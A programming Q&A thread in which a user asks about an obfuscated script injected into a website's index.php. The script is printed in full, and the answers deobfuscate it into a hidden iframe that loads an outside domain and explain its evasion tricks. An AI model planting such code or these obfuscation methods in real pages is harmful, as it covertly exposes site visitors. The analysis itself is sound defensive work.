# Weird javascript appeared in a page

Tags: javascript

This script appeared in the index.php page of a website I help with:

```
<script type="text/javascript">$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\"+$.__$+$.$_$+$.$_$+$.$$$_+"\"+$.__$+$.$_$+$.$$_+$.__+".\"+$.__$+$.$$_+$.$$$+"\"+$.__$+$.$$_+$._$_+"\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"('<"+$.$$_$+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$$_+$.$$_+"\"+$.$__+$.___+"\"+$.__$+$.$$_+$._$$+$.__+"\"+$.__$+$.$$$+$.__$+(![]+"")[$._$_]+$.$$$_+"=\\"\"+$.__$+$.$$_+$.$$_+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$$_+$._$$+"\"+$.__$+$.$_$+$.__$+$.$_$$+"\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+"\"+$.__$+$.$_$+$.__$+$.__+"\"+$.__$+$.$$$+$.__$+":\"+$.$__+$.___+"\"+$.__$+$.$_$+$.___+"\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$_$+$.$$$_+"\"+$.__$+$.$_$+$.$$_+";\\"><\"+$.__$+$.$_$+$.__$+$.$$$$+"\"+$.__$+$.$$_+$._$_+$.$_$_+"\"+$.__$+$.$_$+$.$_$+$.$$$_+"\"+$.$__+$.___+"\"+$.__$+$.$$_+$._$$+"\"+$.__$+$.$$_+$._$_+$.$$__+"=\\"\"+$.__$+$.$_$+$.___+$.__+$.__+"\"+$.__$+$.$$_+$.___+"://"+$.$$$$+"\"+$.__$+$.$$_+$._$_+".\"+$.__$+$.$__+$.$$$+$.$$$_+$._$+"\"+$.__$+$.$$_+$._$_+"\"+$.__$+$.$__+$.$$$+$.$$$_+"\"+$.__$+$.$_$+$._$$+$._$+"\"+$.__$+$.$_$+$.___+"\"+$.__$+$.$_$+$.$$_+$.$$_$+$.$$_$+"\"+$.__$+$.$$_+$._$$+"."+$.$$__+$._$+"\"+$.__$+$.$_$+$.$_$+"/"+$.$$_$+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$$_+$._$_+$.$$$_+$.$$__+$.__+".\"+$.__$+$.$$_+$.___+"\"+$.__$+$.$_$+$.___+"\"+$.__$+$.$$_+$.___+"?\"+$.__$+$.$$_+$.___+$.$_$_+"\"+$.__$+$.$__+$.$$$+$.$$$_+"="+$.$__+$._$$+$.$$$$+$.$$_$+$.$$_$+$.$__$+$.$__+$.$$__+$.__$+$.$$_+$.$$$_+$._$_+$.$$_+$.$__+$.$$$+$.$$_$+"\\"\"+$.$__+$.___+"\"+$.__$+$.$$_+$.$$$+"\"+$.__$+$.$_$+$.__$+$.$$_$+$.__+"\"+$.__$+$.$_$+$.___+"=\\""+$.$__+$.$$_+$.$___+"\\"\"+$.$__+$.___+"\"+$.__$+$.$_$+$.___+$.$$$_+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$__+$.$$$+"\"+$.__$+$.$_$+$.___+$.__+"=\\""+$.$$_+$.___+"\\"\"+$.$__+$.___+$.$_$_+(![]+"")[$._$_]+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$__+$.$$$+"\"+$.__$+$.$_$+$.$$_+"=\\""+(![]+"")[$._$_]+$.$$$_+$.$$$$+$.__+"\\">\"+$.__$+$.___+$._$$+$._$+$._+"\"+$.__$+$.$_$+$.$$_+$.__+$.$$$_+"\"+$.__$+$.$$_+$._$_+"</\"+$.__$+$.$_$+$.__$+$.$$$$+"\"+$.__$+$.$$_+$._$_+$.$_$_+"\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\"+$.__$+$.$_$+$.__$+"\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();
</script>
```

The only thing it seems to do is return an error when you try to open the page. I just removed it and everything works fine again, but we have no idea how it got there, and if it was supposed to actually do something possibly harmful. The website is hosted on aruba and both of the people who have access to the code haven't worked on this page at all lately.

Answer (score 6, accepted):

So now it's a puzzle.

Pretty printing the code, it has 4 stages:

1. Declare $
2. Construct a dictionary using the current value of $, and then assign that to $ again
3. Set a couple of additional key/value pairs in the dictionary using other values from the dictionary
4. Construct an immediately called nested pair of function calls

The $ declaration is, like everything here, a bit odd:

```
$=~[];
```

In a Chrome console, this returns -1; evaluated in a numerical context, [] becomes 0, and ~ (the bitwise NOT operator in javascript) on 0 yields -1. So we have a variable assigned to -1. Unobfuscate!

```
v = -1;
```

Then a dictionary is constructed, with an unobfuscation:

```
$={ ___ : ++$,              dct={ zero  : 0,
  $$$$  : (![] + "")[$],          f     : "f",
  __$   : ++$,                    one   : 1,
  $_$_  : (![] + "")[$],          a     : "a",
  _$_   : ++$,                    two   : 2,
  $_$$  : ({} + "")[$],           b     : "b",
  $$_$  : ($[$] + "")[$],         d     : "d",
  _$$   : ++$,                    three : 3,
  $$$_  : (!"" + "")[$],          e     : "e",
  $__   : ++$,                    four  : 4,
  $_$   : ++$,                    five  : 5,
  $$__  : ({} + "")[$],           c     : "c",
  $$_   : ++$,                    six   : 6,
  $$$   : ++$,                    seven : 7,
  $___  : ++$,                    eight : 8,
  $__$  : ++$                     nine  : 9
  };                            };
```

So we have a dictionary with some values in it from 0 to 9, and the letters a to f. Anyone smell hex? The method to get the letters is to pick out substrings from predictable js-generated strings; a falsy value plus "" gives "false", for "a", "e" and "f". `{}+""` gives `[object Object]`, for b and c, and `undefined` yields the d.

Next it constructs the $_ (we'll call it alpha) element of the dictionary (`$.$_`) as a concatenation of a 
series of strings (unobf names as defined so far, plus `_$` becomes beta, `$$` gamma, `__` delta, 
`$` epsilon, `_` phi):

```
(dct.alpha = dct + "")[dct.five]    // dct.alpha = "[object Object]", yields "c"
(dct.beta  = dct.alpha[dct.one])    // dct.beta="o", yields "o"
(dct.gamma = (dct.epsilon + "")[dct.one]) // dct.gamma="n", "n"
((!dct) + "")[dct.three]            // "s"
(dct.delta = dct.alpha[dct.six])    // dct.delta="t", "t"
(dct.epsilon= (!"" + "")[dct.one])  // dct.epsilon="r", "r"
(dct.phi   = (!"" + "")[dct.two])   // dct.phi = "u", "u"
dct.alpha[dct.5]                    // "c"
dct.delta                           // "t"
dct.beta                            // "o"
dct.epsilon                         // "r"
```

So all of this sets dct.alpha (`$.$_`) to "constructor". Ominous. Similar setup for `$.$$` (which we're calling gamma), which sets it to "return". The clouds thicken.

Another reassignment, this time for `$.$` (our dct.epsilon), sets it to

```
dct.epsilon = (dct.zero)[dct.alpha][dct.alpha]
```

This is more than just an array lookup. `dct.zero` is 0, so (0)["constructor"] is looking up the 
"constructor" property of 0. Remember that in javascript a["b"] is the same as 
a.b, so `(0)["constructor"]["constructor"]` is `0.constructor.constructor`. The constructor of 0 is the Number function, and the constructor of the 
Number function is the Function function. This function (pointer) is then assigned to dct.epsilon. 
The worm has turned.

The final statement is a nested function call to `$.$$`:

```
dct.epsilon(                  Function(
  dct.epsilon(                  Function(
    //long concatenation            // something functiony
  )()                           )()
)();                          )()
```

The long concatenation will be passed to the function constructor and then immediately executed. 
The returned function from this function will also then be immediately executed.

In effect, everything we've seen so far is scaffolding. Almost any function could be constructed this
way, although we have an idea of the letters that will be used. I would hazard a guess that the above
is a generic obfuscation that can hold whatever payload is desired.

The string that is constructed character-by-characeter is:

```
return "docu\155e\156t.\167\162\151te('<d \151 ... // continues
```

So we can see that there are escaped sequences there. In fact, the return 
tells us that the whole docu... string will be helpfully unescaped and then returned wholesale, ready for the
outer call to call it.

So the outer call will recieve this now unescaped string (formatting and splitting the string for readability):

document.write(
     '' + 
       ''+
                  'Counter'+
        ''+
     ''
   );

Where I've put 'HEXYHEXY' instead of the hex string that was there - it would presumaby link your 
site or perhaps the virus author to this page, which we don't really want. The domain in the iframe 
src might be connected to the virus author, or it might be just another compromised page; a worm 
could presumably use one host to direct another via this virus as an intermediary. My guess is that
it just drives fake page impressions - every time your page is hit, so is the target page, but no-one sees
the advert etc because of the hidden div container. The 'Counter' bit is just an attempt to hide
the secret in plain sight; if you looked at the browser's representation of the page, all you see is
an innocent-looking Counter iframe.

## Some javascript tricks to avoid

The virus author has a few tricks here to evade simple methods of finding such scripts:

1. Using ASCII escaping, e.g. `\155` becomes 'm', so the letter is never in a plain string.
2. Passing a string to the Function function to construct an arbitrary function instead of using `eval`
3. Using substrings of predictable auto-generated strings `(![]+"")[3] = "false"[3] = "s"` to pick out individual characters without putting them in plain strings
4. Endless use and reuse of variables with `$` and `_` in the name to confuse a human reader
5. Use of variables in dictionary declaration to make it hard to see static values without executing the code.
6. The assignment return; `(a=b)` returns the value of a, so `(a=b)`[3] returns a substring on the value of the assignment, whilst also making the assignment
7. Throwaway reassignment of variables within a larger assignment, e.g. `a = {(a=3):"b",++a:"c"}`

All of these are things that are a very bad idea in normal code, for the very reason they are here: they make the code hard to read or understand.

Answer (score 2):

It's likely a virus. These kinds of viruses work by infecting a host machine (which is almost always Windows), then copying themselves in any HTML files they can find. When you then open a connection to the server, the "infected" HTML files get copied over and in the end, you end up inadvertently infecting or causing harm to your visitors.

Keep your anti-virus up to date.

Comment: @PhilH, this is not on the server. The developer (or webmaster / admin / whoever has access to the server) Windows machines get infected, then they upload the "infected" HTML files on the Linux server (or whatever the server might be). I'd go for avoiding Windows altogether, but if that's not an option, a good, updated anti-virus, and the latest version of Windows should help...

Comment: My antivirus should be updated, I'll run a scan now and warn the admin as well. Thanks for your answer!
P.S.: so, no idea if that script was meant to do something else, so that we can check for problems it may have caused?

Comment: @MicheleC, well, it's obfuscated for exactly this reason - so you can't tell what it does without a lot of work. I've seen this before though a few times, and in every instance, it was a virus working exactly the way I described, with the purpose of stealing visitor's cookies and history and sending them to the attacker's servers. If strange, obfuscated JavaScript code mysteriously starts appearing in HTML files, it should always be cause for alarm. Look at *all* your HTML files, this is likely not be the only one affected.

Comment: This could be an XSS variant. One of my clients had a bad Wordpress plugin that allowed an attacker to upload a script and execute as the Apache user, which in turn added a similar string to every PHP file that was owned by Apache.  I would check for unknown scripts on the server.